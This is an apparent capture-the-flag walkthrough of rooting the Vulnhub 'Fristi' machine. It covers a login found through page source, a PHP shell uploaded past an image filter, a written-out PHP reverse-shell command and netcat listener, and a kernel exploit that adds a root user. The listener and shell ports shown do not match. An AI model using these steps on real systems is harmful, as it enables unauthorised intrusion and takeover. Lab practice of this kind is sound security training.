Hi, Lets see how we rooted Fristi by Ar0xA from Vulnhub.
First Find the IP and do a port scan.
We have only one port open. Lets scan using Nikto and Gobuster.
Now Gobuster.
Visit the pages found. Nothing inetersting. Right?
We need to find something else. Have a look at the following address.
http://192.168.18.80/fristi/
A login page right?
Lets bry breaking it. SQL Injection didnt work. There must be some other ways. Lets have a look at the source code.
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
Need to look more 🙂 Scroll down to the end.
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
Looks like this is base64 encoded. Lets try decoding.
visit https://www.base64decode.org/ for decoding.
Seems like a PNG image? Lets try decoding as an image here: https://base64.guru/converter/decode/image/png
We got an Image.
Hope this is the password. But what about the username? admin? fristi?
they didnt work. Lets try eezeepz
.
Yes. We are logged in now. We have a file upload form here. But it accepts only images.
We need to upload a php shell as an image here.
I used this shell
https://github.com/melbinkm/PHPImageShell
Rename the file to shell.php.gif and upload.
Fire up Burpsuite and catch the upload request.
Edit the filename in the request to shell.php.gif
and send.
we will get a response as uploaded to uploads directory. Now head to /uploads/shell.php.gif
Now we can set up a listener in our kali machine and connect from this shell.
nc -nlvp 4444
Enter the following command and click Exec.
php -r '$sock=fsockopen("192.168.18.79",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
We got a connection to our Kali machine.
Now its the time for privilege escalation. Use the command uname -a
to know the OS version.
Lets search for an exploit.
What about usng this?
https://www.exploit-db.com/exploits/40839
Lets try
Lets download the file using wget.
Time to compile and run the exploit.
Done! we gave a new user firefart
with password pass
.
Lets see if it is present on /etc/passwd
Yes, Its there at the top. Now lets move to our new account and check our root access.
Yes! we are root now. What about the flag?
Thats all. It took a little more time for me to find the fristi directory, But the privlege escalation part was quick.